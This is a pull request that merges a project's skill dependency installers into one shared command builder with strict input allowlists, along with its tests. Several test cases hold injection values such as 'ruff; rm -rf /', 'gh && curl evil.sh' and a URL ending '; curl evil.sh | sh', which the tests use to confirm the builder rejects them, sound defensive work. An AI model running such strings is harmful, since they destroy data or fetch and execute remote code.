### PR TITLE
fix(skills): converge install kinds onto one vocabulary and command builder

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -6,6 +6,28 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
 
 ## [Unreleased]
 
+### Fixed
+
+- Skill dependency installs work for every kind a skill can declare. Three
+  code paths carried their own idea of what `install.kind` meant — the Skills
+  page executor knew `brew`/`uv`/`download`, the `install_skill_deps` tool knew
+  `brew`/`node`/`go`/`uv`, and the install hints rendered a third, different set — so the
+  seven bundled gmgn skills, which declare `kind: npm`, were uninstallable
+  through both executors ("Unsupported install kind: npm"), and `apt` failed
+  the same way. All three now read one canonical vocabulary and one command
+  builder in `agentos/skills/install_kinds.py`: `brew`, `npm`, `go`, `uv`,
+  `download`, and `apt`, with `node` kept working as an alias for `npm`. The
+  command shown as an install hint is now literally the command that runs.
+  `apt` (needs root) and `download` (needs a fetch plus a chmod) stay
+  hint-only, and say so instead of reading as unsupported. A `uv` spec that
+  declares `bins` installs with `uv tool install`; one that doesn't — a library
+  like `openpyxl` — keeps using `uv pip install`, which the agent tool used to
+  get wrong. Pinned versions (`gmgn-cli@1.2.3`, `openpyxl>=3.1`) now survive the
+  value allowlists instead of losing their install hint, an `apt` package can no
+  longer end in the `-` that turns an install line into a removal, and the
+  `download` hint validates and quotes its URL rather than interpolating it
+  raw. (#358)
+
 ## [2026.8.21] - 2026-08-21
 
 ### Added

--- a/src/agentos/skills/bundled/sub-agent/SKILL.md
+++ b/src/agentos/skills/bundled/sub-agent/SKILL.md
@@ -20,14 +20,14 @@ metadata:
           [
             {
               "id": "node-claude",
-              "kind": "node",
+              "kind": "npm",
               "package": "@anthropic-ai/claude-code",
               "bins": ["claude"],
               "label": "Install Claude Code CLI (npm)",
             },
             {
               "id": "node-codex",
-              "kind": "node",
+              "kind": "npm",
               "package": "@openai/codex",
               "bins": ["codex"],
               "label": "Install Codex CLI (npm)",

--- a/src/agentos/skills/eligibility.py
+++ b/src/agentos/skills/eligibility.py
@@ -7,6 +7,7 @@ import platform
 import shutil
 from dataclasses import dataclass, field
 
+from agentos.skills.install_kinds import normalize_install_kind, render_install_command
 from agentos.skills.types import SkillEnvVar, SkillInstallSpec, SkillSpec
 
 
@@ -106,7 +107,8 @@ def check_eligibility(spec: SkillSpec, ctx: EligibilityContext) -> bool:
 class InstallHint:
     """Display-only install command, decoupled from dependency execution logic."""
 
-    kind: str  # "brew", "uv", "npm", "go", "download"
+    #: Canonical kind — see :data:`agentos.skills.install_kinds.INSTALL_KINDS`.
+    kind: str
     label: str  # "Install himalaya (brew)"
     command: str  # "brew install himalaya"
 
@@ -150,22 +152,13 @@ def _is_declared(spec: SkillSpec) -> bool:
 
 
 def _render_install_command(spec: SkillInstallSpec) -> str:
-    """Render a display-only shell command from an install spec."""
-    name = spec.formula or spec.package or spec.id
-    if spec.kind == "brew":
-        return f"brew install {name}" if name else ""
-    if spec.kind == "uv":
-        return f"uv pip install {spec.package}" if spec.package else ""
-    if spec.kind == "npm":
-        return f"npm install -g {spec.package}" if spec.package else ""
-    if spec.kind == "go":
-        return f"go install {spec.module}@latest" if spec.module else ""
-    if spec.kind == "download" and spec.url:
-        bin_name = spec.bins[0] if spec.bins else spec.id
-        return (
-            f"curl -fsSL -o ~/.local/bin/{bin_name} {spec.url} && chmod +x ~/.local/bin/{bin_name}"
-        )
-    return ""
+    """Render a display-only shell command from an install spec.
+
+    Thin alias for :func:`~agentos.skills.install_kinds.render_install_command`
+    — the hints and the executors read one builder, so what the operator is
+    shown is what would run.
+    """
+    return render_install_command(spec)
 
 
 def diagnose_eligibility(spec: SkillSpec, ctx: EligibilityContext) -> EligibilityReport:
@@ -228,7 +221,7 @@ def diagnose_eligibility(spec: SkillSpec, ctx: EligibilityContext) -> Eligibilit
                 if cmd:
                     install_hints.append(
                         InstallHint(
-                            kind=ispec.kind,
+                            kind=normalize_install_kind(ispec.kind),
                             label=ispec.label or f"Install via {ispec.kind}",
                             command=cmd,
                         )

--- a/src/agentos/skills/hub/deps.py
+++ b/src/agentos/skills/hub/deps.py
@@ -1,21 +1,30 @@
-"""Dependency installation for skills — brew, uv, download."""
+"""Dependency installation for skills — brew, npm, go, uv, download.
+
+Which kinds exist and what each one runs lives in
+:mod:`agentos.skills.install_kinds`, shared with the agent tool and with
+the display-only hints so the three can't drift apart again.
+"""
 
 from __future__ import annotations
 
 import asyncio
-import re
 from dataclasses import dataclass
 
 import structlog
 
+from agentos.skills.install_kinds import (
+    ARGV_INSTALL_KINDS,
+    DOWNLOAD_URL_RE,
+    MANUAL_INSTALL_KINDS,
+    InstallSpecError,
+    build_install_argv,
+    is_supported_install_kind,
+    normalize_install_kind,
+    render_install_command,
+)
 from agentos.skills.types import SkillInstallSpec
 
 log = structlog.get_logger(__name__)
-
-# Strict allowlists to prevent arbitrary shell execution
-_BREW_FORMULA_RE = re.compile(r"^[a-zA-Z0-9][a-zA-Z0-9/_@.-]*$")
-_UV_PACKAGE_RE = re.compile(r"^[a-zA-Z0-9][a-zA-Z0-9._-]*(\[[a-zA-Z0-9,._-]+\])?$")
-_URL_RE = re.compile(r"^https://[a-zA-Z0-9._/-]+$")
 
 
 @dataclass
@@ -43,32 +52,19 @@ async def _run(cmd: list[str], timeout: float = 120.0) -> tuple[int, str, str]:
     return proc.returncode or 0, stdout.decode(), stderr.decode()
 
 
-async def install_brew(spec: SkillInstallSpec) -> DepResult:
-    """Install via Homebrew."""
-    formula = spec.formula or spec.package or spec.id
-    if not formula or not _BREW_FORMULA_RE.match(formula):
-        return DepResult(
-            kind="brew", identifier=formula, success=False, message=f"Invalid formula: {formula}"
-        )
+async def _install_via_argv(spec: SkillInstallSpec) -> DepResult:
+    """Run the shared command for an argv-shaped install kind."""
+    kind = normalize_install_kind(spec.kind)
+    identifier = spec.formula or spec.package or spec.module or spec.id
+    try:
+        argv = build_install_argv(spec)
+    except InstallSpecError as exc:
+        return DepResult(kind=kind, identifier=identifier, success=False, message=str(exc))
 
-    code, out, err = await _run(["brew", "install", formula])
+    code, out, err = await _run(argv)
     if code == 0:
-        return DepResult(kind="brew", identifier=formula, success=True, message="Installed")
-    return DepResult(kind="brew", identifier=formula, success=False, message=err.strip()[:200])
-
-
-async def install_uv(spec: SkillInstallSpec) -> DepResult:
-    """Install a Python package via uv."""
-    package = spec.package or spec.module or spec.id
-    if not package or not _UV_PACKAGE_RE.match(package):
-        return DepResult(
-            kind="uv", identifier=package, success=False, message=f"Invalid package: {package}"
-        )
-
-    code, out, err = await _run(["uv", "pip", "install", package])
-    if code == 0:
-        return DepResult(kind="uv", identifier=package, success=True, message="Installed")
-    return DepResult(kind="uv", identifier=package, success=False, message=err.strip()[:200])
+        return DepResult(kind=kind, identifier=identifier, success=True, message="Installed")
+    return DepResult(kind=kind, identifier=identifier, success=False, message=err.strip()[:200])
 
 
 async def install_download(spec: SkillInstallSpec) -> DepResult:
@@ -77,7 +73,7 @@ async def install_download(spec: SkillInstallSpec) -> DepResult:
     from pathlib import Path
 
     url = spec.url
-    if not url or not _URL_RE.match(url):
+    if not url or not DOWNLOAD_URL_RE.match(url):
         return DepResult(
             kind="download", identifier=url or "", success=False, message=f"Invalid URL: {url}"
         )
@@ -103,9 +99,9 @@ async def install_download(spec: SkillInstallSpec) -> DepResult:
     )
 
 
+# Keyed by canonical kind — see agentos.skills.install_kinds.
 _INSTALLERS = {
-    "brew": install_brew,
-    "uv": install_uv,
+    **{kind: _install_via_argv for kind in ARGV_INSTALL_KINDS},
     "download": install_download,
 }
 
@@ -114,33 +110,37 @@ async def install_deps(specs: list[SkillInstallSpec]) -> list[DepResult]:
     """Install all dependencies for a skill. Returns results per spec."""
     results = []
     for spec in specs:
-        handler = _INSTALLERS.get(spec.kind)
+        kind = normalize_install_kind(spec.kind)
+        handler = _INSTALLERS.get(kind)
         if handler is None:
-            results.append(
-                DepResult(
-                    kind=spec.kind,
-                    identifier=spec.id,
-                    success=False,
-                    message=f"Unsupported install kind: {spec.kind}",
-                )
-            )
+            if kind in MANUAL_INSTALL_KINDS:
+                # Spell the command out: nothing else on this path shows it,
+                # and telling the operator to go find it is a dead end.
+                command = render_install_command(spec)
+                message = f"Install kind '{kind}' needs elevated privileges"
+                message += f" — run: {command}" if command else " and cannot be run here"
+            elif is_supported_install_kind(kind):  # pragma: no cover - defensive
+                message = f"No installer wired for kind: {kind}"
+            else:
+                message = f"Unsupported install kind: {spec.kind}"
+            results.append(DepResult(kind=kind, identifier=spec.id, success=False, message=message))
             continue
         try:
             result = await handler(spec)
         except FileNotFoundError:
             result = DepResult(
-                kind=spec.kind,
+                kind=kind,
                 identifier=spec.id,
                 success=False,
-                message=f"Tool not found for kind '{spec.kind}' (brew/uv/curl)",
+                message=f"Tool not found for kind '{kind}' (brew/npm/go/uv/curl)",
             )
         except Exception as exc:
             result = DepResult(
-                kind=spec.kind,
+                kind=kind,
                 identifier=spec.id,
                 success=False,
                 message=f"Error: {exc}",
             )
         results.append(result)
-        log.info("deps.install", kind=spec.kind, id=spec.id, success=result.success)
+        log.info("deps.install", kind=kind, id=spec.id, success=result.success)
     return results

--- a/src/agentos/skills/install_kinds.py
+++ b/src/agentos/skills/install_kinds.py
@@ -1,0 +1,159 @@
+"""Canonical vocabulary and command builder for skill install specs.
+
+Three code paths used to carry their own idea of which ``install.kind`` values
+exist and what each one runs — the Web UI executor
+(:mod:`agentos.skills.hub.deps`), the agent tool (``install_skill_deps``), and
+the display-only hints in :mod:`agentos.skills.eligibility`. They disagreed, so
+a skill declaring a kind one path knew about failed on another, and the command
+shown to the operator wasn't always the command that ran.
+
+Everything now flows through this module: the kind sets below, and
+:func:`build_install_argv`, which is both what the executors run and what the
+hints render.
+
+Not every declarable kind can be executed on the operator's behalf. ``apt``
+needs root and ``download`` needs a fetch plus a chmod, so they narrow down
+through :data:`AUTO_INSTALL_KINDS` and :data:`ARGV_INSTALL_KINDS` — they still
+render a command the operator can copy.
+"""
+
+from __future__ import annotations
+
+import re
+import shlex
+from typing import TYPE_CHECKING
+
+if TYPE_CHECKING:
+    from agentos.skills.types import SkillInstallSpec
+
+#: Every install kind a skill manifest may declare, after normalization.
+INSTALL_KINDS = frozenset({"brew", "npm", "go", "uv", "download", "apt"})
+
+#: Legacy spellings kept working, mapped onto their canonical kind.
+INSTALL_KIND_ALIASES = {"node": "npm"}
+
+#: Kinds that need a privilege agentos won't take on the operator's behalf.
+#: They render an install command and nothing else.
+MANUAL_INSTALL_KINDS = frozenset({"apt"})
+
+#: Kinds :func:`agentos.skills.hub.deps.install_deps` can run unattended.
+AUTO_INSTALL_KINDS = frozenset(INSTALL_KINDS - MANUAL_INSTALL_KINDS)
+
+#: Kinds that reduce to a single argv. ``download`` is absent because fetching
+#: a binary also has to mark it executable, which no one argv does; it runs
+#: through :func:`agentos.skills.hub.deps.install_download`.
+ARGV_INSTALL_KINDS = frozenset(AUTO_INSTALL_KINDS - {"download"})
+
+# Strict allowlists — an install spec must never reach a shell as a flag or as
+# a second command, and must not turn into a different operation on the
+# package manager's own syntax.
+_BREW_FORMULA_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9/_@.+-]*$")
+# npm: optional @scope, plus the optional @version or @tag a manifest may pin.
+_NPM_PACKAGE_RE = re.compile(
+    r"^(?:@[A-Za-z0-9][A-Za-z0-9._-]*/)?[A-Za-z0-9][A-Za-z0-9._-]*(?:@[A-Za-z0-9][A-Za-z0-9.^~*-]*)?$"
+)
+_GO_MODULE_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._~/-]*(?:@[A-Za-z0-9][A-Za-z0-9._~+-]*)?$")
+# uv: package, optional extras, optional PEP 440 specifier (``ruff==0.5.0``).
+_UV_PACKAGE_RE = re.compile(
+    r"^[A-Za-z0-9][A-Za-z0-9._-]*(\[[A-Za-z0-9,._-]+\])?"
+    r"(?:(?:[=<>!~]=|[<>])[A-Za-z0-9][A-Za-z0-9.*+!_-]*)?$"
+)
+# apt: a trailing '-' on an install line means *remove* that package, and a
+# trailing '+' means force-install, so the last character is anchored too.
+_APT_PACKAGE_RE = re.compile(r"^[a-z0-9](?:[a-z0-9.+-]*[a-z0-9])?$")
+#: A download URL never becomes an argv, but the hint that shows it must not
+#: be able to smuggle a second shell command past the operator.
+DOWNLOAD_URL_RE = re.compile(r"^https://[a-zA-Z0-9._/-]+$")
+# The binary a download lands as — it becomes an unquoted path in that hint.
+_BIN_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*$")
+
+
+class InstallSpecError(ValueError):
+    """An install spec names an unknown kind or an unusable value."""
+
+
+def normalize_install_kind(kind: str) -> str:
+    """Return the canonical spelling of ``kind`` (unknown kinds pass through)."""
+    normalized = (kind or "").strip().lower()
+    return INSTALL_KIND_ALIASES.get(normalized, normalized)
+
+
+def is_supported_install_kind(kind: str) -> bool:
+    """Whether ``kind`` names a known install kind, alias spellings included."""
+    return normalize_install_kind(kind) in INSTALL_KINDS
+
+
+def _checked(value: str, pattern: re.Pattern[str], label: str) -> str:
+    if not value:
+        raise InstallSpecError(f"Missing install value: {label}")
+    if value.startswith("-") or not pattern.match(value):
+        raise InstallSpecError(f"Unsafe install value for {label}: {value}")
+    return value
+
+
+def build_install_argv(spec: SkillInstallSpec) -> list[str]:
+    """Return the command for ``spec``, or raise :class:`InstallSpecError`.
+
+    Covers :data:`ARGV_INSTALL_KINDS` plus ``apt`` — whose command is rendered
+    for the operator to run but never executed here. ``download`` has no argv
+    form and always raises.
+    """
+    kind = normalize_install_kind(spec.kind)
+
+    if kind == "brew":
+        # brew is the one kind allowed to fall back to the spec id: its
+        # manifests have always named the spec after the formula. The
+        # others must say what they install — an id like "node-claude" is
+        # a label, and installing it from a public registry is a hazard.
+        formula = _checked(spec.formula or spec.package or spec.id, _BREW_FORMULA_RE, "formula")
+        return ["brew", "install", formula]
+
+    if kind == "npm":
+        package = _checked(spec.package, _NPM_PACKAGE_RE, "package")
+        # --ignore-scripts: installing a dependency must not run arbitrary
+        # lifecycle scripts from the registry on the operator's machine.
+        return ["npm", "install", "-g", "--ignore-scripts", package]
+
+    if kind == "go":
+        module = _checked(spec.module or spec.package, _GO_MODULE_RE, "module")
+        return ["go", "install", module if "@" in module else f"{module}@latest"]
+
+    if kind == "uv":
+        package = _checked(spec.package or spec.module, _UV_PACKAGE_RE, "package")
+        # A spec that declares bins wants a command on PATH; one that doesn't
+        # wants an importable library in the environment.
+        subcommand = ["tool", "install"] if spec.bins else ["pip", "install"]
+        return ["uv", *subcommand, package]
+
+    if kind == "apt":
+        package = _checked(spec.package, _APT_PACKAGE_RE, "package")
+        return ["sudo", "apt-get", "install", "-y", package]
+
+    if kind == "download":
+        raise InstallSpecError(
+            "Install kind 'download' has no single-command form; it runs through the Skills page"
+        )
+
+    raise InstallSpecError(f"Unsupported install kind: {spec.kind}")
+
+
+def render_install_command(spec: SkillInstallSpec) -> str:
+    """The shell command for ``spec`` as a copyable string, or ``""``.
+
+    Every surface that shows an operator what to run goes through here, so what
+    is displayed is what :func:`build_install_argv` would execute. ``download``
+    has no argv form and is spelled out — validated and quoted the same way.
+    """
+    if normalize_install_kind(spec.kind) == "download":
+        url = spec.url
+        if not url or not DOWNLOAD_URL_RE.match(url):
+            return ""
+        bin_name = spec.bins[0] if spec.bins else spec.id
+        if not _BIN_NAME_RE.match(bin_name or ""):
+            return ""
+        dest = f"~/.local/bin/{bin_name}"
+        return f"curl -fsSL -o {dest} {shlex.quote(url)} && chmod +x {dest}"
+    try:
+        return shlex.join(build_install_argv(spec))
+    except InstallSpecError:
+        return ""

--- a/src/agentos/skills/types.py
+++ b/src/agentos/skills/types.py
@@ -167,7 +167,9 @@ class SkillRequires:
 class SkillInstallSpec:
     """How to install a skill's dependencies."""
 
-    kind: str = ""  # brew | node | go | uv | download
+    #: One of ``agentos.skills.install_kinds.INSTALL_KINDS``:
+    #: brew | npm | go | uv | download | apt (``node`` is an alias for ``npm``).
+    kind: str = ""
     id: str = ""
     label: str = ""
     bins: list[str] = field(default_factory=list)

--- a/src/agentos/tools/builtin/skill_tools.py
+++ b/src/agentos/tools/builtin/skill_tools.py
@@ -21,6 +21,12 @@ from agentos.skills.hub.defaults import (
     installed_skill_identifiers,
     installed_skill_names,
 )
+from agentos.skills.install_kinds import (
+    MANUAL_INSTALL_KINDS,
+    InstallSpecError,
+    build_install_argv,
+    normalize_install_kind,
+)
 from agentos.skills.types import SkillInstallSpec, SkillLayer
 from agentos.tools.registry import tool
 from agentos.tools.types import ToolError
@@ -42,11 +48,6 @@ _INSTALL_OUTPUT_LIMIT = 4_000
 # Room after the view ceiling for the outline index and the trailing notes.
 _SKILL_VIEW_PERSIST_HEADROOM = 4_000
 _INSTALL_TIMEOUT_SECONDS = 120.0
-
-_BREW_FORMULA_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9/_@.+-]*$")
-_NODE_PACKAGE_RE = re.compile(r"^(?:@[A-Za-z0-9][A-Za-z0-9._-]*/)?[A-Za-z0-9][A-Za-z0-9._-]*$")
-_GO_MODULE_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._~/-]*(?:@[A-Za-z0-9][A-Za-z0-9._~+-]*)?$")
-_UV_PACKAGE_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*(\[[A-Za-z0-9,._-]+\])?$")
 
 
 def _sanitize_yaml_value(value: str) -> str:
@@ -84,49 +85,19 @@ def _cap_output(value: bytes | str, limit: int = _INSTALL_OUTPUT_LIMIT) -> str:
     return f"{text[:limit]}\n... truncated {omitted} characters"
 
 
-def _validate_install_value(value: str, pattern: re.Pattern[str], label: str) -> str:
-    if not value:
-        raise ToolError(f"Missing install value: {label}")
-    if value.startswith("-") or not pattern.match(value):
-        raise ToolError(f"Unsafe install value for {label}: {value}")
-    return value
-
-
 def _argv_for_install_spec(spec: SkillInstallSpec) -> list[str]:
-    kind = spec.kind
-    if kind == "download":
-        raise ToolError("Install kind 'download' is deferred and cannot be executed")
-    if kind == "brew":
-        formula = _validate_install_value(
-            spec.formula or spec.package,
-            _BREW_FORMULA_RE,
-            "formula",
-        )
-        return ["brew", "install", formula]
-    if kind == "node":
-        package = _validate_install_value(
-            spec.package,
-            _NODE_PACKAGE_RE,
-            "package",
-        )
-        return ["npm", "install", "-g", "--ignore-scripts", package]
-    if kind == "go":
-        module = _validate_install_value(
-            spec.module or spec.package,
-            _GO_MODULE_RE,
-            "module",
-        )
-        if "@" not in module:
-            module = f"{module}@latest"
-        return ["go", "install", module]
-    if kind == "uv":
-        package = _validate_install_value(
-            spec.package or spec.module,
-            _UV_PACKAGE_RE,
-            "package",
-        )
-        return ["uv", "tool", "install", package]
-    raise ToolError(f"Unsupported install kind: {kind}")
+    """The command for an install spec, or a ToolError explaining why not.
+
+    The command itself comes from :mod:`agentos.skills.install_kinds`, the same
+    builder the Skills page runs and renders.
+    """
+    kind = normalize_install_kind(spec.kind)
+    if kind in MANUAL_INSTALL_KINDS:
+        raise ToolError(f"Install kind '{kind}' needs elevated privileges and cannot be run here")
+    try:
+        return build_install_argv(spec)
+    except InstallSpecError as exc:
+        raise ToolError(str(exc)) from exc
 
 
 def _find_install_spec(skill_name: str, install_id: str) -> SkillInstallSpec:
@@ -988,7 +959,7 @@ def create_skill_tools(loader: SkillLoader) -> None:
         name="install_skill_deps",
         description=(
             "Preview or install a skill dependency declared in skill metadata. "
-            "Supports brew, node, go, and uv install specs. This does not install "
+            "Supports brew, npm, go, and uv install specs. This does not install "
             "Community skills; use skill_install_community for ClawHub installs."
         ),
         params={

--- a/tests/test_skill_install_kinds.py
+++ b/tests/test_skill_install_kinds.py
@@ -1,0 +1,316 @@
+"""Every install kind a skill declares must work on every code path.
+
+Three implementations used to disagree about which ``install.kind`` values
+exist and what each one runs — the Web UI executor, the agent tool, and the
+display-only hints — so a bundled skill declaring ``kind: npm`` errored on two
+of the three. These tests pin the vocabulary and hold the paths together.
+"""
+
+from __future__ import annotations
+
+import shlex
+from pathlib import Path
+
+import pytest
+
+from agentos.skills.eligibility import _render_install_command
+from agentos.skills.hub import deps
+from agentos.skills.install_kinds import (
+    ARGV_INSTALL_KINDS,
+    AUTO_INSTALL_KINDS,
+    INSTALL_KIND_ALIASES,
+    INSTALL_KINDS,
+    MANUAL_INSTALL_KINDS,
+    InstallSpecError,
+    build_install_argv,
+    is_supported_install_kind,
+    normalize_install_kind,
+    render_install_command,
+)
+from agentos.skills.loader import SkillLoader
+from agentos.skills.types import SkillInstallSpec
+from agentos.tools.builtin.skill_tools import _argv_for_install_spec
+from agentos.tools.types import ToolError
+
+ROOT = Path(__file__).resolve().parents[1]
+BUNDLED = ROOT / "src" / "agentos" / "skills" / "bundled"
+
+# A representative spec per canonical kind, complete enough for every path.
+SPECS: dict[str, SkillInstallSpec] = {
+    "brew": SkillInstallSpec(kind="brew", id="himalaya", formula="himalaya", bins=["himalaya"]),
+    "npm": SkillInstallSpec(kind="npm", id="gmgn-cli", package="gmgn-cli", bins=["gmgn-cli"]),
+    "go": SkillInstallSpec(kind="go", id="gotop", module="github.com/x/gotop", bins=["gotop"]),
+    "uv": SkillInstallSpec(kind="uv", id="ruff", package="ruff", bins=["ruff"]),
+    "apt": SkillInstallSpec(kind="apt", id="apt", package="gh", bins=["gh"]),
+    "download": SkillInstallSpec(
+        kind="download", id="bin", url="https://example.com/bin", bins=["bin"]
+    ),
+}
+
+
+def _bundled_install_specs() -> list[tuple[str, SkillInstallSpec]]:
+    loader = SkillLoader(bundled_dir=BUNDLED)
+    pairs: list[tuple[str, SkillInstallSpec]] = []
+    for spec in loader.load_all():
+        if spec.metadata is None:
+            continue
+        pairs.extend((spec.name, ispec) for ispec in spec.metadata.install)
+    return pairs
+
+
+# ── The vocabulary itself ──────────────────────────────────────────────
+
+
+def test_canonical_kinds_cover_every_representative_spec() -> None:
+    assert set(SPECS) == set(INSTALL_KINDS)
+
+
+def test_kind_sets_narrow_consistently() -> None:
+    assert ARGV_INSTALL_KINDS < AUTO_INSTALL_KINDS < INSTALL_KINDS
+    assert MANUAL_INSTALL_KINDS < INSTALL_KINDS
+    assert not (MANUAL_INSTALL_KINDS & AUTO_INSTALL_KINDS)
+    assert set(deps._INSTALLERS) == set(AUTO_INSTALL_KINDS)
+
+
+def test_aliases_resolve_to_canonical_kinds() -> None:
+    for alias, canonical in INSTALL_KIND_ALIASES.items():
+        assert canonical in INSTALL_KINDS
+        assert normalize_install_kind(alias) == canonical
+        assert normalize_install_kind(alias.upper()) == canonical
+        assert is_supported_install_kind(alias)
+    assert not is_supported_install_kind("cargo")
+    assert normalize_install_kind("") == ""
+
+
+# ── Every declared kind works on every path ────────────────────────────
+
+
+def test_every_bundled_install_kind_is_supported() -> None:
+    pairs = _bundled_install_specs()
+    assert pairs, "expected bundled skills to declare install specs"
+    for skill_name, ispec in pairs:
+        assert is_supported_install_kind(ispec.kind), (
+            f"{skill_name} declares unsupported install kind {ispec.kind!r}"
+        )
+
+
+def test_every_bundled_install_spec_works_on_every_path() -> None:
+    for skill_name, ispec in _bundled_install_specs():
+        kind = normalize_install_kind(ispec.kind)
+
+        # Display path: every declarable kind renders a copyable command.
+        assert _render_install_command(ispec), f"{skill_name}: empty install hint for {kind!r}"
+
+        # Web UI executor: it builds the command it is about to run.
+        if kind in ARGV_INSTALL_KINDS:
+            assert build_install_argv(ispec), f"{skill_name}: no command for {kind!r}"
+        assert kind in deps._INSTALLERS or kind in MANUAL_INSTALL_KINDS, (
+            f"{skill_name}: no installer for {kind!r}"
+        )
+
+        # Agent tool: the same command reaches it (download and apt don't).
+        if kind in ARGV_INSTALL_KINDS:
+            assert _argv_for_install_spec(ispec) == build_install_argv(ispec)
+
+
+@pytest.mark.parametrize("kind", sorted(INSTALL_KINDS))
+def test_each_canonical_kind_is_wired_on_every_path(kind: str) -> None:
+    spec = SPECS[kind]
+    assert _render_install_command(spec)
+    if kind in AUTO_INSTALL_KINDS:
+        assert kind in deps._INSTALLERS
+    if kind in ARGV_INSTALL_KINDS:
+        assert _argv_for_install_spec(spec) == build_install_argv(spec)
+
+
+def test_hint_shows_exactly_what_the_executor_would_run() -> None:
+    for kind in sorted(ARGV_INSTALL_KINDS):
+        spec = SPECS[kind]
+        assert _render_install_command(spec) == shlex.join(_argv_for_install_spec(spec))
+
+
+# ── The commands themselves ────────────────────────────────────────────
+
+
+def test_commands_per_kind() -> None:
+    assert build_install_argv(SPECS["brew"]) == ["brew", "install", "himalaya"]
+    assert build_install_argv(SPECS["npm"]) == [
+        "npm",
+        "install",
+        "-g",
+        "--ignore-scripts",
+        "gmgn-cli",
+    ]
+    assert build_install_argv(SPECS["go"]) == ["go", "install", "github.com/x/gotop@latest"]
+    assert build_install_argv(SPECS["uv"]) == ["uv", "tool", "install", "ruff"]
+    assert build_install_argv(SPECS["apt"]) == ["sudo", "apt-get", "install", "-y", "gh"]
+
+
+def test_uv_library_spec_installs_into_the_environment() -> None:
+    # No bins declared: the skill imports the package, it doesn't shell out to
+    # it, so `uv tool install` would have nothing to put on PATH.
+    library = SkillInstallSpec(kind="uv", id="openpyxl", package="openpyxl")
+    assert build_install_argv(library) == ["uv", "pip", "install", "openpyxl"]
+
+
+def test_brew_falls_back_to_the_spec_id() -> None:
+    # brew manifests have always named the spec after the formula, and the
+    # display path honoured that.
+    spec = SkillInstallSpec(kind="brew", id="himalaya", bins=["himalaya"])
+    assert build_install_argv(spec) == ["brew", "install", "himalaya"]
+    assert _render_install_command(spec) == "brew install himalaya"
+
+
+@pytest.mark.parametrize("kind", ["npm", "go", "uv", "apt"])
+def test_other_kinds_never_install_the_spec_id(kind: str) -> None:
+    # An id is a label — "node-claude", "libreoffice-darwin", "apt". Installing
+    # one from a public registry because `package` was left off is a hazard, so
+    # these kinds must say what they install.
+    spec = SkillInstallSpec(kind=kind, id="node-claude")
+    with pytest.raises(InstallSpecError, match="Missing install value"):
+        build_install_argv(spec)
+
+
+def test_pinned_versions_survive_the_allowlists() -> None:
+    npm = SkillInstallSpec(kind="npm", id="cli", package="gmgn-cli@1.2.3")
+    uv_lib = SkillInstallSpec(kind="uv", id="openpyxl", package="openpyxl>=3.1")
+    assert build_install_argv(npm)[-1] == "gmgn-cli@1.2.3"
+    assert build_install_argv(uv_lib)[-1] == "openpyxl>=3.1"
+    # Quoted, so the rendered hint can't redirect when it is pasted into a shell.
+    assert _render_install_command(uv_lib) == "uv pip install 'openpyxl>=3.1'"
+
+
+def test_apt_package_cannot_smuggle_an_operator() -> None:
+    # A trailing '-' on an apt install line *removes* the package, and -y
+    # suppresses the prompt that would have caught it.
+    with pytest.raises(InstallSpecError, match="Unsafe install value"):
+        build_install_argv(SkillInstallSpec(kind="apt", id="x", package="sudo-"))
+
+
+def test_node_alias_builds_the_npm_argv() -> None:
+    spec = SkillInstallSpec(kind="node", id="claude", package="@anthropic-ai/claude-code")
+    assert _argv_for_install_spec(spec) == [
+        "npm",
+        "install",
+        "-g",
+        "--ignore-scripts",
+        "@anthropic-ai/claude-code",
+    ]
+
+
+def test_go_keeps_a_pinned_version() -> None:
+    spec = SkillInstallSpec(kind="go", id="gotop", module="github.com/x/gotop@v1.2.3")
+    assert build_install_argv(spec) == ["go", "install", "github.com/x/gotop@v1.2.3"]
+
+
+@pytest.mark.parametrize(
+    "spec",
+    [
+        SkillInstallSpec(kind="npm", id="evil", package="--registry=http://evil"),
+        SkillInstallSpec(kind="brew", id="evil", formula="--build-from-source"),
+        SkillInstallSpec(kind="uv", id="evil", package="ruff; rm -rf /"),
+        SkillInstallSpec(kind="apt", id="evil", package="gh && curl evil.sh"),
+        SkillInstallSpec(kind="go", id="", module=""),
+    ],
+    ids=["npm-flag", "brew-flag", "uv-shell", "apt-shell", "go-empty"],
+)
+def test_unsafe_or_missing_values_never_build_a_command(spec: SkillInstallSpec) -> None:
+    with pytest.raises(InstallSpecError):
+        build_install_argv(spec)
+    assert _render_install_command(spec) == ""
+
+
+def test_download_is_not_argv_executable() -> None:
+    assert _render_install_command(SPECS["download"]).startswith("curl -fsSL")
+    with pytest.raises(InstallSpecError, match="download"):
+        build_install_argv(SPECS["download"])
+    with pytest.raises(ToolError, match="download"):
+        _argv_for_install_spec(SPECS["download"])
+
+
+def test_download_hint_rejects_a_url_the_executor_would_refuse() -> None:
+    # The hint claims to be the command that runs, so it must not render one
+    # the executor rejects — or one carrying a second shell command.
+    evil = SkillInstallSpec(
+        kind="download", id="bin", url="https://x/y; curl evil.sh | sh", bins=["bin"]
+    )
+    assert render_install_command(evil) == ""
+
+
+def test_apt_is_hint_only_for_the_agent_tool() -> None:
+    assert _render_install_command(SPECS["apt"]) == "sudo apt-get install -y gh"
+    with pytest.raises(ToolError, match="elevated privileges"):
+        _argv_for_install_spec(SPECS["apt"])
+
+
+# ── The executor ───────────────────────────────────────────────────────
+
+
+async def test_install_deps_runs_npm_for_an_npm_spec(monkeypatch: pytest.MonkeyPatch) -> None:
+    calls: list[list[str]] = []
+
+    async def fake_run(cmd: list[str], timeout: float = 120.0) -> tuple[int, str, str]:
+        calls.append(cmd)
+        return 0, "", ""
+
+    monkeypatch.setattr(deps, "_run", fake_run)
+    results = await deps.install_deps([SPECS["npm"]])
+
+    assert calls == [["npm", "install", "-g", "--ignore-scripts", "gmgn-cli"]]
+    assert results[0].success
+    assert results[0].kind == "npm"
+    assert results[0].identifier == "gmgn-cli"
+
+
+async def test_install_deps_accepts_the_node_alias(monkeypatch: pytest.MonkeyPatch) -> None:
+    calls: list[list[str]] = []
+
+    async def fake_run(cmd: list[str], timeout: float = 120.0) -> tuple[int, str, str]:
+        calls.append(cmd)
+        return 0, "", ""
+
